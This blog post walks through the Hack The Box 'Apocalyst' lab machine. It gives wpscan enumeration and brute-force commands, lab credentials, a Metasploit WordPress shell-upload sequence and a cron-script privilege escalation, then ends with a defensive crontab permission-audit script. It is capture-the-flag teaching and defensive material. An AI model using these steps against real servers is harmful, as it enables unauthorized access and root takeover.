In this blog post, I'll share my journey through the "Apocalyst" challenge on Hack The Box, an intermediate-level machine that tests skills in web application enumeration, password cracking, and privilege escalation. The primary focus of this challenge is on exploiting a WordPress installation to gain initial access and then escalating privileges to root.
Vulnerability Overview
The key vulnerabilities exploited in this challenge include:
Weak Passwords: The use of easily guessable passwords allowed unauthorized access to the WordPress admin panel.
Information Disclosure: Sensitive information, such as password hashes, was exposed through improper file permissions, facilitating unauthorized access.
Remote Code Execution (RCE) via WordPress Plugin: Exploiting the WordPress admin panel to upload a malicious plugin enabled remote code execution on the server.
These vulnerabilities exist due to poor security practices, such as inadequate password policies and improper handling of sensitive information, which can lead to unauthorized system access in real-world scenarios.
I began by performing an Nmap scan to identify open ports and services on the target machine. The scan revealed that ports 22 (SSH) and 80 (HTTP) were open. Navigating to http://10.10.10.46/ displayed a default Apache page, indicating that the web server was active but not providing much information. To discover potential subdomains, I added apocalyst.htb to my /etc/hosts file and used the wpscan tool to enumerate themes, plugins, and users:
wpscan --url http://apocalyst.htb/ --enumerate t --enumerate p --enumerate u
This scan revealed a username: falaraki.
Using dirb, I enumerated directories on the web server. The scan discovered a directory named /Rightiousness. Accessing http://10.10.10.46/Rightiousness displayed an image. Suspecting steganography, I used steghide to extract hidden information. This extraction yielded a list.txt file containing potential passwords. Using the obtained username falaraki and the list.txt file, I attempted to brute-force the WordPress login:
wpscan --url http://10.10.10.46/ --username falaraki --wordlist list.txt
This revealed the password: Transclisiation.
With valid credentials, I logged into the WordPress admin panel and used Metasploit's wp_admin_shell_upload module to upload a malicious plugin, granting a reverse shell:
use exploit/unix/webapp/wp_admin_shell_upload
set rhost 10.10.10.46
set username falaraki
set password Transclisiation
exploit
This provided a Meterpreter session.
Within the Meterpreter session, I navigated to /home/falaraki and found a file named .secret containing a base64-encoded string. Decoding it revealed a password, which I used to log in as falaraki over SSH and collect the user.txt flag. To escalate privileges, I ran the LinEnum script to identify potential vectors. It pointed me to a cron job that executed a script my user was able to write to. By modifying that script to spawn a root shell, I obtained the root.txt flag.
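The root step above and the "improper file permissions" weakness listed earlier come down to one check a defender can run routinely: does any scheduled command point at a script that a non-root user can modify? The following audit script is an added example written for this post, not code from the challenge or from LinEnum; it assumes the system crontab layout (min hour dom mon dow user command) and reads the file path from its first argument.

```shell
#!/bin/sh
# Added example (not from the writeup): audit a system crontab for scheduled
# commands whose script file can be modified by group or other users, which
# is the misconfiguration that gave root here. Assumes the system crontab
# layout "min hour dom mon dow user command" (as in /etc/crontab and
# /etc/cron.d/*); per-user crontabs omit the user field.

# audit_cron_file FILE
# Prints "WRITABLE <path>" for every scheduled command whose executable is
# group- or world-writable. Returns 1 if any were found, 0 otherwise.
audit_cron_file() {
    crontab_file="$1"
    found=0
    while IFS= read -r line; do
        case "$line" in
            ''|\#*) continue ;;            # blank lines and comments
            [A-Za-z_]*=*) continue ;;      # environment assignments (PATH=, MAILTO=)
        esac
        # The command starts at field 7, or field 3 for @reboot-style entries;
        # only its first word (the script path) is checked.
        cmd_path=$(printf '%s\n' "$line" | awk '{ if ($1 ~ /^@/) print $3; else print $7 }')
        [ -f "$cmd_path" ] || continue     # relative names and shell builtins are skipped
        # find -L follows symlinks so the target's permission bits are tested.
        if [ -n "$(find -L "$cmd_path" \( -perm -g+w -o -perm -o+w \) -print)" ]; then
            printf 'WRITABLE %s\n' "$cmd_path"
            found=1
        fi
    done < "$crontab_file"
    return "$found"
}

# Usage: sh audit_cron.sh /etc/crontab
if [ $# -gt 0 ]; then
    audit_cron_file "$1"
fi
```

Run it against /etc/crontab and each file under /etc/cron.d; a non-zero exit status is a finding that a root-owned job can be hijacked by whoever owns the write bit on the script.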